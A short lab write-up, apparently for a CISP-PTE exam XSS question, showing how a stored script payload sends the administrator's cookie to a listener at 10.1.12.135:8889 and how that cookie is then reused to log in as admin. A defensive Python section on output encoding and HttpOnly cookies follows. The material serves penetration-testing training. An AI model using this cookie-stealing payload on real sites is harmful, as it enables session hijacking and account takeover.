lca

True lack of freedom is the cage you build in your own heart.

CISP-PTE XSS exam questions

The goal of this XSS question is to obtain the administrator's cookie and then reuse that cookie to log in as the administrator.

Clicking "Test" on the challenge page lets you leave a message.

Prepare the XSS payload to obtain the cookie:

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

Start the web service to receive the cookie:

python -m SimpleHTTPServer 8889

Write the payload into the input box.

Click "Submit Query".

Wait.

Check whether the Python server has received the cookie.

Copy the cookie.

1acb0fb952b3caaf1ab7277511923138

Replace the cookie value.

Click "Edit" to replace.

Refresh the page and click "Admin".

Successfully logged in and obtained the key.
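
The two conditions this walkthrough depends on, seen from the defender's side, as an added example (not code from the original post or from the exam application): the stored message is rendered without HTML encoding, and the session cookie is readable by script. The cookie name `session`, the `<li class="message">` markup and the collector host are assumptions made for illustration.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input: a message shaped like the walkthrough's payload,
# with a placeholder collector host instead of a real address.
SAMPLE_MESSAGE = (
    "<script>document.write('<img src=\"http://collector.example/?'"
    "+escape(document.cookie)+'\">')</script>"
)

def render_message_vulnerable(message: str) -> str:
    """Stored text is pasted into the page as-is, so markup in it executes."""
    return '<li class="message">' + message + "</li>"

def render_message_hardened(message: str) -> str:
    """HTML-encode the stored text so the browser displays it instead of parsing it."""
    return '<li class="message">' + html.escape(message, quote=True) + "</li>"

def session_cookie(session_id: str, hardened: bool) -> str:
    """Build the Set-Cookie value; 'session' is a hypothetical cookie name."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["path"] = "/"
    if hardened:
        jar["session"]["httponly"] = True      # hidden from document.cookie
        jar["session"]["samesite"] = "Strict"  # not sent on cross-site requests
    return jar["session"].OutputString()

def readable_by_script(set_cookie_value: str) -> bool:
    """Browsers expose a cookie to document.cookie only if HttpOnly is absent."""
    attrs = [part.strip().lower() for part in set_cookie_value.split(";")[1:]]
    return "httponly" not in attrs

if __name__ == "__main__":
    for hardened in (False, True):
        render = render_message_hardened if hardened else render_message_vulnerable
        cookie = session_cookie("constructed-session-id", hardened)
        print("hardened" if hardened else "vulnerable")
        print("  page fragment:", render(SAMPLE_MESSAGE))
        print("  Set-Cookie:", cookie)
        print("  readable by document.cookie:", readable_by_script(cookie))
```

Either control alone breaks the chain shown above: encoding stops the script from running, and HttpOnly keeps the session identifier out of `document.cookie` even if some script does run.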
